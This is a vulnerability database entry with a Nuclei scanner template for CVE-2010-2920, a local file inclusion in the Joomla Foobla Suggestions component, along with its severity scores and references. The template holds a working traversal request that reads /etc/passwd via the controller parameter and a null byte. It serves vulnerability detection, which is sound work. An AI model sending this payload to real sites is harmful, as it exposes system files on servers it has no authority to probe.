Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-2920
HistorySep 05, 2021 - 11:03 p.m.

Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion

2021-09-0523:03:05
ProjectDiscovery
github.com
3
cve
joomla
local file inclusion
foobla
exploitdb

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

AI Score

6.6

Confidence

Low

EPSS

0.035

Percentile

91.6%

A directory traversal vulnerability in the Foobla Suggestions (com_foobla_suggestions) component 1.5.1.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.

id: CVE-2010-2920

info:
  name: Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the Foobla Suggestions (com_foobla_suggestions) component 1.5.1.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/12120
    - https://nvd.nist.gov/vuln/detail/CVE-2010-2920
    - http://www.vupen.com/english/advisories/2010/1844
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/57660
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
    cvss-score: 6.8
    cve-id: CVE-2010-2920
    cwe-id: CWE-22
    epss-score: 0.03527
    epss-percentile: 0.91571
    cpe: cpe:2.3:a:foobla:com_foobla_suggestions:1.5.1.2:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: foobla
    product: com_foobla_suggestions
  tags: cve,cve2010,joomla,lfi,edb,foobla

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ab1ecd9388a72b63dd3c8b790894bb078b4993b8f937584c44f3bf6be66e8c04022100b34366bca7a019753bf817d4238b4917e7694aff29df603e0779819cc1e843b8:922c64590222798bb761d5b6d8e72950

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

AI Score

6.6

Confidence

Low

EPSS

0.035

Percentile

91.6%

Related for NUCLEI:CVE-2010-2920